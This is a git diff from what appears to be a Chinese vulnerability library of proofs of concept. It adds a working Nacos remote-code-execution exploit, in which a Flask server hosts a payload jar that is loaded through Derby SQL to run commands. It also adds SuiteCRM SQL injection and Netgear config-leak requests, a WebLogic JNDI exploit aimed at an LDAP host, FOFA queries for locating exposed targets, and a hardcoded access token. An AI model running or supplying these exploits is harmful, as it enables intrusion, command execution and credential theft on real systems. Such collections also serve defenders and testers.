AAA' + +app = Flask(__name__) + + +@app.route('/download') +def download_file(): + data = base64.b64decode(payload) + response = Response(data, mimetype="application/octet-stream") + # response.headers["Content-Disposition"] = "attachment; filename=file.bin" + return response + +if __name__ == '__main__': + app.run(host="127.0.0.1", port=5000) +``` + +### exp.py + +```python +import random +import sys +import requests +from urllib.parse import urljoin +import config + + +# 按装订区域中的绿色按钮以运行脚本。 +def exploit(target, command, service): + removal_url = urljoin(target,'/nacos/v1/cs/ops/data/removal') + derby_url = urljoin(target, '/nacos/v1/cs/ops/derby') + for i in range(0,sys.maxsize): + id = ''.join(random.sample('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ',8)) + post_sql = """CALL sqlj.install_jar('{service}', 'NACOS.{id}', 0)\n + CALL SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY('derby.database.classpath','NACOS.{id}')\n + CREATE FUNCTION S_EXAMPLE_{id}( PARAM VARCHAR(2000)) RETURNS VARCHAR(2000) PARAMETER STYLE JAVA NO SQL LANGUAGE JAVA EXTERNAL NAME 'test.poc.Example.exec'\n""".format(id=id,service=service); + option_sql = "UPDATE ROLES SET ROLE='1' WHERE ROLE='1' AND ROLE=S_EXAMPLE_{id}('{cmd}')\n".format(id=id,cmd=command); + get_sql = "select * from (select count(*) as b, S_EXAMPLE_{id}('{cmd}') as a from config_info) tmp /*ROWS FETCH NEXT*/".format(id=id,cmd=command); + #get_sql = "select * from users /*ROWS FETCH NEXT*/".format(id=id,cmd=command); + files = {'file': post_sql} + post_resp = requests.post(url=removal_url,files=files) + post_json = post_resp.json() + if post_json.get('message',None) is None and post_json.get('data',None) is not None: + print(post_resp.text) + get_resp = requests.get(url=derby_url,params={'sql':get_sql}) + print(get_resp.text) + break + + +if __name__ == '__main__': + service = 'http://{host}:{port}/download'.format(host=config.server_host,port=config.server_port) + target = 'http://127.0.0.1:8848' + command = 'calc' + target = input('请输入目录URL,默认:http://127.0.0.1:8848:') or target + command = input('请输入命令,默认:calc:') or command + exploit(target=target, command=command,service=service) + +``` + +首先运行 service.py + +![image-20240715172141600](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407151723092.png) + +接着运行exp.py + +![image-20240715172307594](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407151723670.png) + + + +## Nacos开启鉴权 + +可以结合弱口令或者其他漏洞获取到 `accesstoken` 后进行RCE + +```python +import random +import sys +import requests +from urllib.parse import urljoin +import config + +headers={"accesstoken":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcyMTA1OTk4N30.fq5BNRx6wUHZSDutEqFEmSqAd3Hw6E04FBYyEWiR82g"} +# 按装订区域中的绿色按钮以运行脚本。 +def exploit(target, command, service): + removal_url = urljoin(target,'/nacos/v1/cs/ops/data/removal') + derby_url = urljoin(target, '/nacos/v1/cs/ops/derby') + for i in range(0,sys.maxsize): + id = ''.join(random.sample('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ',8)) + post_sql = """CALL sqlj.install_jar('{service}', 'NACOS.{id}', 0)\n + CALL SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY('derby.database.classpath','NACOS.{id}')\n + CREATE FUNCTION S_EXAMPLE_{id}( PARAM VARCHAR(2000)) RETURNS VARCHAR(2000) PARAMETER STYLE JAVA NO SQL LANGUAGE JAVA EXTERNAL NAME 'test.poc.Example.exec'\n""".format(id=id,service=service); + option_sql = "UPDATE ROLES SET ROLE='1' WHERE ROLE='1' AND ROLE=S_EXAMPLE_{id}('{cmd}')\n".format(id=id,cmd=command); + get_sql = "select * from (select count(*) as b, S_EXAMPLE_{id}('{cmd}') as a from config_info) tmp /*ROWS FETCH NEXT*/".format(id=id,cmd=command); + #get_sql = "select * from users /*ROWS FETCH NEXT*/".format(id=id,cmd=command); + files = {'file': post_sql} + post_resp = requests.post(url=removal_url,files=files,headers=headers) + post_json = post_resp.json() + if post_json.get('message',None) is None and post_json.get('data',None) is not None: + print(post_resp.text) + get_resp = requests.get(url=derby_url,params={'sql':get_sql},headers=headers) + print(get_resp.text) + break + + +if __name__ == '__main__': + service = 'http://{host}:{port}/download'.format(host=config.server_host,port=config.server_port) + target = 'http://127.0.0.1:8848' + command = 'calc' + target = input('请输入目录URL,默认:http://127.0.0.1:8848:') or target + command = input('请输入命令,默认:calc:') or command + exploit(target=target, command=command,service=service) + +``` + + + +## 漏洞来源 + +- https://github.com/ayoundzw/nacos-poc \ No newline at end of file diff --git "a/Netgear-WN604\346\216\245\345\217\243downloadFile.php\344\277\241\346\201\257\346\263\204\351\234\262\346\274\217\346\264\236(CVE-2024-6646).md" "b/Netgear-WN604\346\216\245\345\217\243downloadFile.php\344\277\241\346\201\257\346\263\204\351\234\262\346\274\217\346\264\236(CVE-2024-6646).md" new file mode 100644 index 0000000..e65c1aa --- /dev/null +++ "b/Netgear-WN604\346\216\245\345\217\243downloadFile.php\344\277\241\346\201\257\346\263\204\351\234\262\346\274\217\346\264\236(CVE-2024-6646).md" @@ -0,0 +1,21 @@ +# Netgear-WN604接口downloadFile.php信息泄露漏洞(CVE-2024-6646) + +Netgear WN604 downloadFile.php接口处存在信息泄露漏洞,文件身份验证的远程攻击者可以利用此漏洞获取无线路由器的管理员账号密码信息,导致路由器后台被控,攻击者可对无线网络发起破坏或进一步威胁。 + +## fofa + +```yaml +title=="Netgear" +``` + +## poc + +```yaml +GET /downloadFile.php?file=config HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Accept-Encoding: gzip, deflate +Connection: close +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407162316664.png) \ No newline at end of file diff --git a/README.md b/README.md index 8b19397..fe25769 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,34 @@ # 漏洞文库 将 `https://github.com/wy876/POC `中的poc/exp 使用docsify分类整理,方便查看。 +## 2024.7.20 更新漏洞 + +- WebLogic远程代码执行漏洞(CVE-2024-21006) +- 广联达OA接口ArchiveWebService存在XML实体注入漏洞 +- 亿赛通电子文档安全管理系统NetSecConfigAjax接口存在SQL注入漏洞 +- 亿赛通电子文档安全管理系统NoticeAjax接口存在SQL注入漏洞 +- 云课网校系统文件上传漏洞(DVB-2024-6594) +- 全息AI网络运维平台ajax_cloud_router_config.php存在命令执行漏洞 +- 1Panel面板最新前台RCE漏洞(CVE-2024-39911) +- 用友CRM客户关系管理系统import.php存在任意文件上传漏洞 +- 致远互联AnalyticsCloud分析云存在任意文件读取漏洞 +- 海洋CMS后台admin_smtp.php存在远程代码执行漏洞 +- DedeCMSV5.7.114后台article_template_rand.php存在远程代码执行漏洞 +- DedeCMSV5.7.114后台sys_verizes.php存在远程代码执行漏洞 +- fogproject系统接口export.php存在远程命令执行漏洞(CVE-2024-39914) +- LiveNVR流媒体服务软件接口存在未授权访问漏洞 +- 拼团零售商城系统前台任意文件写入漏洞 +- Nacos远程代码执行漏洞 +- 蓝凌KEP前台RCE漏洞 +- 某自动发卡网alipay_notify.php存在SQL注入漏洞 +- 赛蓝企业管理系统GetExcellTemperature存在SQL注入漏洞 +- SuiteCRM系统接口responseEntryPoint存在SQL注入漏洞(CVE-2024-36412) +- Netgear-WN604接口downloadFile.php信息泄露漏洞(CVE-2024-6646) +- 泛微e-cology9接口XmlRpcServlet存在任意文件读取漏洞 +- 泛微E-office-10接口leave_record.php存在SQL注入漏洞 +- 用友GRP-A-Cloud政府财务云系统接口selectGlaDatasourcePreview存在SQL注入漏洞 +- 用友NC-Cloud文件服务器用户登陆绕过漏洞 + ## 2024.7.15 更新漏洞 - 新中新中小学智慧校园信息管理系统Upload接口存在任意文件上传漏洞 diff --git "a/SuiteCRM\347\263\273\347\273\237\346\216\245\345\217\243responseEntryPoint\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236(CVE-2024-36412).md" "b/SuiteCRM\347\263\273\347\273\237\346\216\245\345\217\243responseEntryPoint\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236(CVE-2024-36412).md" new file mode 100644 index 0000000..6a4bfc5 --- /dev/null +++ "b/SuiteCRM\347\263\273\347\273\237\346\216\245\345\217\243responseEntryPoint\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236(CVE-2024-36412).md" @@ -0,0 +1,28 @@ +## SuiteCRM系统接口responseEntryPoint存在SQL注入漏洞(CVE-2024-36412) + +SuiteCRM存在SQL注入漏洞,未经身份验证的远程攻击者可以通过该漏洞拼接执行SQL注入语句,从而获取数据库敏感信息。 + +## 影响范围: + +``` +SuiteCRM < 7.14.4 +SuiteCRM < 8.6.1 +``` + +## fofa + +```yaml +title="SuiteCRM" +``` + +## poc + +```yaml +GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(5);--+-&type=c&response=accept HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Accept-Encoding: gzip +Connection: close +``` + +![image-20240716202647446](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407162026514.png) \ No newline at end of file diff --git "a/WebLogic\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236(CVE-2024-21006).md" "b/WebLogic\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236(CVE-2024-21006).md" new file mode 100644 index 0000000..88b6672 --- /dev/null +++ "b/WebLogic\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236(CVE-2024-21006).md" @@ -0,0 +1,158 @@ +# WebLogic远程代码执行漏洞(CVE-2024-21006) + +Oracle WebLogic Server 产品中存在漏洞。受影响的受支持版本为 12.2.1.4.0 和 14.1.1.0.0。易于利用的漏洞允许未经身份验证的攻击者通过 T3、IIOP 进行网络访问来破坏 Oracle WebLogic Server。成功攻击此漏洞可能会导致对关键数据的未经授权的访问或对所有 Oracle WebLogic Server 可访问数据的完全访问 + +## fofa + +```yaml +(body="Welcome to WebLogic Server") || (title=="Error 404--Not Found") || (((body=" +BEA WebLogic Server" || server="Weblogic" || body="content=\"WebLogic Server" || body=" +Welcome to Weblogic Application" || body=" +BEA WebLogic Server") && header!="couchdb" && header!="boa" && header!="RouterOS" && header!="X-Generator: Drupal") || (banner="Weblogic" && banner!="couchdb" && banner!="drupal" && banner!=" Apache,Tomcat,Jboss" && banner!="ReeCam IP Camera" && banner!=" +Blog Comments +")) || (port="7001" && protocol=="weblogic") +``` + +## poc + +```java +package org.example; + +import weblogic.j2ee.descriptor.InjectionTargetBean; +import weblogic.j2ee.descriptor.MessageDestinationRefBean; + +import javax.naming.*; +import java.util.Hashtable; + +public class MessageDestinationReference { + + public static void main(String[] args) throws Exception { + String ip = "192.168.31.69"; + String port = "7001"; +// String rmiurl = "ldap://192.168.0.103/cVLtcNoHML/Plain/Exec/eyJjbWQiOiJ0b3VjaCAvdG1wL3N1Y2Nlc3MxMjMifQ=="; + String rhost = String.format("iiop://%s:%s", ip, port); + + Hashtable env = new Hashtable(); + // add wlsserver/server/lib/weblogic.jar to classpath,else will error. + env.put("java.naming.factory.initial", "weblogic.jndi.WLInitialContextFactory"); + env.put(Context.PROVIDER_URL, rhost); + Context context = new InitialContext(env); +// Reference reference = new Reference("weblogic.application.naming.MessageDestinationObjectFactory","weblogic.application.naming.MessageDestinationObjectFactory",""); + weblogic.application.naming.MessageDestinationReference messageDestinationReference=new weblogic.application.naming.MessageDestinationReference(null, new MessageDestinationRefBean() { + @Override + public String[] getDescriptions() { + return new String[0]; + } + + @Override + public void addDescription(String s) { + + } + + @Override + public void removeDescription(String s) { + + } + + @Override + public void setDescriptions(String[] strings) { + + } + + @Override + public String getMessageDestinationRefName() { + return null; + } + + @Override + public void setMessageDestinationRefName(String s) { + + } + + @Override + public String getMessageDestinationType() { + return "weblogic.application.naming.MessageDestinationReference"; + } + + @Override + public void setMessageDestinationType(String s) { + + } + + @Override + public String getMessageDestinationUsage() { + return null; + } + + @Override + public void setMessageDestinationUsage(String s) { + + } + + @Override + public String getMessageDestinationLink() { + return null; + } + + @Override + public void setMessageDestinationLink(String s) { + + } + + @Override + public String getMappedName() { + return null; + } + + @Override + public void setMappedName(String s) { + + } + + @Override + public InjectionTargetBean[] getInjectionTargets() { + return new InjectionTargetBean[0]; + } + + @Override + public InjectionTargetBean createInjectionTarget() { + return null; + } + + @Override + public void destroyInjectionTarget(InjectionTargetBean injectionTargetBean) { + + } + + @Override + public String getLookupName() { + return null; + } + + @Override + public void setLookupName(String s) { + + } + + @Override + public String getId() { + return null; + } + + @Override + public void setId(String s) { + + } + }, "ldap://127.0.0.1:1389/deserialJackson", null, null); + + context.bind("L0ne1y",messageDestinationReference); + context.lookup("L0ne1y"); + } +} +``` + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/r2hVjX_liGblvfm8RZuNDQ \ No newline at end of file diff --git a/_sidebar.md b/_sidebar.md index 35263f6..4c14c99 100644 --- a/_sidebar.md +++ b/_sidebar.md @@ -7,19 +7,19 @@ - [Apache_OFBiz_身份验证绕过漏洞(CVE-2023-51467)](/Apache_OFBiz/Apache_OFBiz_身份验证绕过漏洞(CVE-2023-51467).md) - [Apache-OFBiz存在路径遍历导致RCE漏洞(CVE-2024-36104)](Apache-OFBiz存在路径遍历导致RCE漏洞(CVE-2024-36104).md) -- Apache Struts2 +- **Apache Struts2** - [Apache_Struts2_CVE-2023-50164](Apache_Struts2_CVE-2023-50164.md) -- Apache_Spark +- **Apache_Spark** - [Apache_Spark命令执行漏洞(CVE-2023-32007)](Apache_Spark命令执行漏洞(CVE-2023-32007).md) -- Apache Dubbo +- **Apache Dubbo** - [Apache_Dubbo_反序列化漏洞(CVE-2023-29234)](Apache_Dubbo_反序列化漏洞(CVE-2023-29234).md) -- Apache Solr +- **Apache Solr** - [Apache_Solr环境变量信息泄漏漏洞(CVE-2023-50290)](Apache_Solr环境变量信息泄漏漏洞(CVE-2023-50290).md) -- Apache Submarine +- **Apache Submarine** - [Apache-Submarine-SQL注入漏洞CVE-2023-37924](Apache-Submarine-SQL注入漏洞CVE-2023-37924.md) -- Apache ActiveMQ +- **Apache ActiveMQ** - [Apache-ActiveMQ-Jolokia-远程代码执行漏洞-CVE-2022-41678](Apache-ActiveMQ-Jolokia-远程代码执行漏洞-CVE-2022-41678.md) -- Appium Desktop +- **Appium Desktop** - [Appium_Desktop_CVE-2023-2479漏洞](Appium_Desktop_CVE-2023-2479漏洞.md) - Adobe ColdFusion - [Adobe-ColdFusion任意文件读取漏洞CVE-2024-20767](Adobe-ColdFusion任意文件读取漏洞CVE-2024-20767.md) @@ -36,6 +36,7 @@ - [ArubaOS-RCE漏洞(CVE-2024-26304)](ArubaOS-RCE漏洞(CVE-2024-26304).md) - Weblogic - [Weblogic远程代码执行(CVE-2024-20931)](Weblogic远程代码执行(CVE-2024-20931).md) + - [WebLogic远程代码执行漏洞(CVE-2024-21006)](WebLogic远程代码执行漏洞(CVE-2024-21006).md) - GitLab - [GitLab任意用户密码重置漏洞(CVE-2023-7028)](GitLab任意用户密码重置漏洞(CVE-2023-7028).md) - Confluence @@ -56,6 +57,8 @@ - [Coremail邮件系统未授权访问获取管理员账密](Coremail邮件系统未授权访问获取管理员账密.md) - Dedecms - [Dedecms_v5.7.111前台tags.php_SQL注入漏洞](Dedecms_v5.7.111前台tags.php_SQL注入漏洞.md) + - [DedeCMSV5.7.114后台article_template_rand.php存在远程代码执行漏洞](DedeCMSV5.7.114后台article_template_rand.php存在远程代码执行漏洞.md) + - [DedeCMSV5.7.114后台sys_verizes.php存在远程代码执行漏洞](DedeCMSV5.7.114后台sys_verizes.php存在远程代码执行漏洞.md) - avcon综合管理平台 - [avcon综合管理平台SQL注入漏洞](avcon综合管理平台SQL注入漏洞.md) - Array_VPN @@ -218,6 +221,9 @@ - ShokoServer - [ShokoServer系统withpath任意文件读取漏洞(CVE-2023-43662)](ShokoServer系统withpath任意文件读取漏洞(CVE-2023-43662).md) +- Nacos + - [Nacos远程代码执行漏洞](Nacos远程代码执行漏洞.md) + - 360 or 奇安信 - [360_新天擎终端安全管理系统存在信息泄露漏洞](360_新天擎终端安全管理系统存在信息泄露漏洞.md) - [360天擎_-_未授权与sql注入](360天擎_-_未授权与sql注入.md) @@ -225,7 +231,7 @@ - [奇安信天擎rptsvr任意文件上传](奇安信天擎rptsvr任意文件上传.md) - [天擎终端安全管理系统YII_CSRF_TOKEN远程代码执行漏洞](天擎终端安全管理系统YII_CSRF_TOKEN远程代码执行漏洞.md) - [奇安信VPN任意用户密码重置](奇安信VPN任意用户密码重置.md) -- 海康威视 +- **海康威视** - [HiKVISION_综合安防管理平台_任意文件上传漏洞](HiKVISION_综合安防管理平台_任意文件上传漏洞.md) - [海康威视-综合安防管理平台-files-文件读取](海康威视-综合安防管理平台-files-文件读取.md) - [海康威视CVE-2023-6895_IP网络对讲广播系统远程命令执行](海康威视CVE-2023-6895_IP网络对讲广播系统远程命令执行.md) @@ -240,7 +246,7 @@ - [海康威视综合安防管理平台applyAutoLoginTicket远程代码执行漏洞](海康威视综合安防管理平台applyAutoLoginTicket远程代码执行漏洞.md) - [海康威视综合安防download存在任意文件读取漏洞](海康威视综合安防download存在任意文件读取漏洞.md) - [海康威视综合安防管理平台keepAlive远程代码执行漏洞](海康威视综合安防管理平台keepAlive远程代码执行漏洞.md) -- 深信服 +- **深信服** - [深信服SANGFOR终端检测响应平台_-_任意用户免密登录,前台RCE](深信服SANGFOR终端检测响应平台_-_任意用户免密登录,前台RCE.md) - [深信服SG上网优化管理系统_catjs.php_任意文件读取漏洞](深信服SG上网优化管理系统_catjs.php_任意文件读取漏洞.md) - [深信服下一代防火墙NGAF_RCE漏洞](深信服下一代防火墙NGAF_RCE漏洞.md) @@ -248,7 +254,7 @@ - [深信服数据中心管理系统_XML_实体注入漏洞](深信服数据中心管理系统_XML_实体注入漏洞.md) - [深信服应用交付系统命令执行漏洞](某x服应用交付系统命令执行漏洞.md) - [某服_sxf-报表系统命令执行漏洞](某服_sxf-报表系统命令执行漏洞.md) -- 绿盟 +- **绿盟** - [某盟sas安全审计系统任意文件读取漏洞](某盟sas安全审计系统任意文件读取漏洞.md) - [某盟_SAS堡垒机_local_user.php_任意用户登录漏洞](某盟_SAS堡垒机_local_user.php_任意用户登录漏洞.md) - [某盟_SAS堡垒机_漏洞](某盟_SAS堡垒机_漏洞.md) @@ -260,7 +266,7 @@ - [金山云EDR任意文件上传漏洞](金山云EDR任意文件上传漏洞.md) - 瑞星EDR - [瑞星EDR-XSS漏洞可打管理员cookie](瑞星EDR-XSS漏洞可打管理员cookie.md) -- 泛微 +- **泛微** - [泛微e-cology9_SQL注入-CNVD-2023-12632](泛微e-cology9_SQL注入-CNVD-2023-12632.md) - [泛微E-MobileServer远程命令执行漏洞](泛微E-MobileServer远程命令执行漏洞.md) - [泛微e-office_未授权访问](泛微e-office_未授权访问.md) @@ -296,7 +302,9 @@ - [泛微e-office-uploadify.php存在任意文件上传漏洞](泛微e-office-uploadify.php存在任意文件上传漏洞.md) - [泛微OA-E-Cology接口WorkflowServiceXml存在SQL注入漏洞](泛微OA-E-Cology接口WorkflowServiceXml存在SQL注入漏洞.md) - [泛微E-Cology接口getFileViewUrl存在SSRF漏洞](泛微E-Cology接口getFileViewUrl存在SSRF漏洞.md) -- 万户OA + - [泛微e-cology9接口XmlRpcServlet存在任意文件读取漏洞](泛微e-cology9接口XmlRpcServlet存在任意文件读取漏洞.md) + - [泛微E-office-10接口leave_record.php存在SQL注入漏洞](泛微E-office-10接口leave_record.php存在SQL注入漏洞.md) +- **万户OA** - [万户ezoffice_wpsservlet任意文件上传漏洞](万户ezoffice_wpsservlet任意文件上传漏洞.md) - [万户OA-upload任意文件上传漏洞](万户OA-upload任意文件上传漏洞.md) - [万户_ezOFFICE_DocumentEdit.jsp_SQL注入](万户_ezOFFICE_DocumentEdit.jsp_SQL注入.md) @@ -326,8 +334,7 @@ - [D-LINK-DIR-X4860未授权RCE漏洞](D-LINK-DIR-X4860未授权RCE漏洞.md) - [D-LINK-Go-RT-AC750 GORTAC750_A1_FW_v101b03存在硬编码漏洞(CVE-2024-22853)](D-LINK-Go-RT-AC750 GORTAC750_A1_FW_v101b03存在硬编码漏洞(CVE-2024-22853).md) - [D-LINK-DIR-845L接口bsc_sms_inbox.php存在信息泄露漏洞](D-LINK-DIR-845L接口bsc_sms_inbox.php存在信息泄露漏洞.md) - -- 亿赛通 +- **亿赛通** - [亿赛通电子文档安全管理系统远程命令执行漏洞](亿赛通电子文档安全管理系统远程命令执行漏洞.md) - [亿赛通电子文档平台文件上传漏洞](亿赛通电子文档平台文件上传漏洞.md) - [亿赛通电子文档安全管理系统XStream反序列化任意文件上传](亿赛通电子文档安全管理系统XStream反序列化任意文件上传.md) @@ -348,8 +355,9 @@ - [亿赛通电子文档安全管理系统-UploadFileManagerService-任意文件读取漏洞](亿赛通电子文档安全管理系统-UploadFileManagerService-任意文件读取漏洞.md) - [亿赛通电子文档安全管理系统downloadfromfile存在任意文件读取漏洞](亿赛通电子文档安全管理系统downloadfromfile存在任意文件读取漏洞.md) - [亿赛通-电子文档安全管理系统SaveCDGPermissionFromGFOA接口存在sql注入漏洞](亿赛通-电子文档安全管理系统SaveCDGPermissionFromGFOA接口存在sql注入漏洞.md) - -- 大华 + - [亿赛通电子文档安全管理系统NetSecConfigAjax接口存在SQL注入漏洞](亿赛通电子文档安全管理系统NetSecConfigAjax接口存在SQL注入漏洞.md) + - [亿赛通电子文档安全管理系统NoticeAjax接口存在SQL注入漏洞](亿赛通电子文档安全管理系统NoticeAjax接口存在SQL注入漏洞.md) +- **大华** - [大华DSS_itcBulletin_SQL_注入漏洞](大华DSS_itcBulletin_SQL_注入漏洞.md) - [大华智慧园区管理平台任意文件读取](大华智慧园区管理平台任意文件读取.md) - [大华智慧园区综合管理平台_deleteFtp_远程命令执行漏洞](大华智慧园区综合管理平台_deleteFtp_远程命令执行漏洞.md) @@ -371,13 +379,11 @@ - [大华DSS城市安防监控平台login_init.action接口存在Struct2-045命令执行漏洞](大华DSS城市安防监控平台login_init.action接口存在Struct2-045命令执行漏洞.md) - [大华ICC智能物联综合管理平台heapdump敏感信息泄露](大华ICC智能物联综合管理平台heapdump敏感信息泄露.md) - - - 网神 - [某神_SecGate_3600_防火墙_obj_app_upfile_任意文件上传漏洞](某神_SecGate_3600_防火墙_obj_app_upfile_任意文件上传漏洞.md) - [某神_SecSSL_3600安全接入网关系统_任意密码修改漏洞](某神_SecSSL_3600安全接入网关系统_任意密码修改漏洞.md) - [网神防火墙_app_av_import_save文件上传漏洞](网神防火墙_app_av_import_save文件上传漏洞.md) - [网神SecGate 3600 防火墙sys_hand_upfile 任意文件上传漏洞](网神SecGate-3600防火墙-sys_hand_upfile-任意文件上传漏洞.md) - - 网康 - [网康科技NS-ASG应用安全网关list_ipAddressPolicy.php存在SQL注入漏洞(CVE-2024-2022)](网康科技NS-ASG应用安全网关list_ipAddressPolicy.php存在SQL注入漏洞(CVE-2024-2022).md) - [网康NS-ASG应用安全网关singlelogin.php存在SQL注入漏洞](网康NS-ASG应用安全网关singlelogin.php存在SQL注入漏洞.md) @@ -386,9 +392,7 @@ - [网康科技NS-ASG应用安全网关add_postlogin.php存在SQL注入漏洞](网康科技NS-ASG应用安全网关add_postlogin.php存在SQL注入漏洞.md) - [网康科技NS-ASG应用安全网关config_Anticrack.php存在SQL注入漏洞](网康科技NS-ASG应用安全网关config_Anticrack.php存在SQL注入漏洞.md) - [网康科技NS-ASG应用安全网关config_ISCGroupNoCache.php存在SQL注入漏洞](网康科技NS-ASG应用安全网关config_ISCGroupNoCache.php存在SQL注入漏洞.md) - -- 用友 - +- **用友** - [用友CRM_任意文件读取漏洞](用友CRM_任意文件读取漏洞.md) - [用友GRP-U8存在XML注入漏洞](用友GRP-U8存在XML注入漏洞.md) @@ -595,7 +599,12 @@ - [用友时空KSOA接口com.sksoft.bill.QueryService存在SQL注入漏洞](用友时空KSOA接口com.sksoft.bill.QueryService存在SQL注入漏洞.md) -- 致远 + - [用友CRM客户关系管理系统import.php存在任意文件上传漏洞](用友CRM客户关系管理系统import.php存在任意文件上传漏洞.md) + + - [用友GRP-A-Cloud政府财务云系统接口selectGlaDatasourcePreview存在SQL注入漏洞](用友GRP-A-Cloud政府财务云系统接口selectGlaDatasourcePreview存在SQL注入漏洞.md) + + - [用友NC-Cloud文件服务器用户登陆绕过漏洞](用友NC-Cloud文件服务器用户登陆绕过漏洞.md) +- **致远** - [致远M1_usertokenservice_反序列化RCE漏洞](致远M1_usertokenservice_反序列化RCE漏洞.md) - [致远OA_M3_Server_反序列化漏洞](致远OA_M3_Server_反序列化漏洞.md) @@ -634,17 +643,15 @@ - [致远互联FE协作办公平台codeMoreWidget.js存在sql注入漏洞](致远互联FE协作办公平台codeMoreWidget.js存在sql注入漏洞.md) - - -- 通达OA + - [致远互联AnalyticsCloud分析云存在任意文件读取漏洞](致远互联AnalyticsCloud分析云存在任意文件读取漏洞.md) +- **通达OA** - [通达OA_down.php接口存在未授权访问漏洞](通达OA_down.php接口存在未授权访问漏洞.md) - [通达OA_get_datas.php前台sql注入](通达OA_get_datas.php前台sql注入.md) - [通达OA_header身份认证绕过漏洞](通达OA_header身份认证绕过漏洞.md) - [通达OA_sql注入漏洞_CVE-2023-4165](通达OA_sql注入漏洞_CVE-2023-4165.md) - [通达OA_sql注入漏洞_CVE-2023-4166](通达OA_sql注入漏洞_CVE-2023-4166.md) - [通达OA-WHERE_STR存在前台SQL注入漏洞](通达OA-WHERE_STR存在前台SQL注入漏洞.md) - -- 蓝凌 +- **蓝凌** - [蓝凌EIS智慧协同平台saveImg接口存在任意文件上传漏洞](蓝凌EIS智慧协同平台saveImg接口存在任意文件上传漏洞.md) - [蓝凌EKP前台授权绕过导致文件上传](蓝凌EKP前台授权绕过导致文件上传.md) - [蓝凌OAsysUiComponent_文件存在任意文件上传漏洞](蓝凌OAsysUiComponent_文件存在任意文件上传漏洞.md) @@ -653,8 +660,8 @@ - [蓝凌EIS智慧协同平台多个接口SQL注入](蓝凌EIS智慧协同平台多个接口SQL注入.md) - [蓝凌OA-WechatLoginHelper.do存在SQL注入漏洞](蓝凌OA-WechatLoginHelper.do存在SQL注入漏洞.md) - [蓝凌EIS智慧协同平台rpt_listreport_definefield.aspx接口存在SQL注入漏洞](蓝凌EIS智慧协同平台rpt_listreport_definefield.aspx接口存在SQL注入漏洞.md) - -- 金蝶 + - [蓝凌KEP前台RCE漏洞](蓝凌KEP前台RCE漏洞.md) +- **金蝶** - [金蝶Apusic应用服务器loadTree_JNDI注入漏洞](金蝶Apusic应用服务器loadTree_JNDI注入漏洞.md) - [金蝶Apusic应用服务器任意文件上传](金蝶Apusic应用服务器任意文件上传.md) - [金蝶EAS_myUploadFile任意文件上传](金蝶EAS_myUploadFile任意文件上传.md) @@ -665,23 +672,19 @@ - [金蝶EAS_pdfviewlocal任意文件读取漏洞](金蝶EAS_pdfviewlocal任意文件读取漏洞.md) - [金蝶云-星空ServiceGateway反序列化漏洞](金蝶云-星空ServiceGateway反序列化漏洞.md) - [金蝶云星空UserService反序列化漏洞](金蝶云星空UserService反序列化漏洞.md) - - 红帆OA - [红帆OA_iorepsavexml.aspx_文件上传漏洞](红帆OA_iorepsavexml.aspx_文件上传漏洞.md) - [红帆OA_zyy_AttFile.asmx_SQL注入漏洞](红帆OA_zyy_AttFile.asmx_SQL注入漏洞.md) - [红帆ioffice-udfGetDocStep.asmx存在SQL注入漏洞](红帆ioffice-udfGetDocStep.asmx存在SQL注入漏洞.md) - - 广联达oa - [广联达oa_sql注入漏洞_](广联达oa_sql注入漏洞_.md) - [广联达OA前台任意文件上传](广联达OA前台任意文件上传.md) - [广联达OA任意用户登录](广联达OA任意用户登录.md) - [广联达-linkworks-gwgdwebservice存在SQL注入漏洞](广联达-linkworks-gwgdwebservice存在SQL注入漏洞.md) - + - [广联达OA接口ArchiveWebService存在XML实体注入漏洞](广联达OA接口ArchiveWebService存在XML实体注入漏洞.md) - 全程云OA - [全程云OA-svc.asmxSQL注入漏洞](全程云OA-svc.asmxSQL注入漏洞.md) - -- 宏景OA - +- **宏景OA** - [宏景OA文件上传](宏景OA文件上传.md) - [宏景DisplayFiles任意文件读取](宏景DisplayFiles任意文件读取.md) - [宏景eHR-HCM-DisplayExcelCustomReport接口存在任意文件读取漏洞](宏景eHR-HCM-DisplayExcelCustomReport接口存在任意文件读取漏洞.md) @@ -698,7 +701,6 @@ - [宏景eHR人力资源管理系统接口loadtree存在SQL注入漏洞](宏景eHR人力资源管理系统接口loadtree存在SQL注入漏洞.md) - [宏景eHR人力资源管理系统接口LoadOtherTreeServlet存在SQL注入漏洞](宏景eHR人力资源管理系统接口LoadOtherTreeServlet存在SQL注入漏洞.md) - [宏景eHR人力资源管理系统接口DownLoadCourseware存在任意文件读取漏洞](宏景eHR人力资源管理系统接口DownLoadCourseware存在任意文件读取漏洞.md) - - 金和OA - [金和OA_jc6_clobfield_SQL注入漏洞](金和OA_jc6_clobfield_SQL注入漏洞.md) - [金和OA任意文件读取漏洞](金和OA任意文件读取漏洞.md) @@ -717,31 +719,24 @@ - [金和OA-C6接口DownLoadBgImage存在任意文件读取漏洞](金和OA-C6接口DownLoadBgImage存在任意文件读取漏洞.md) - 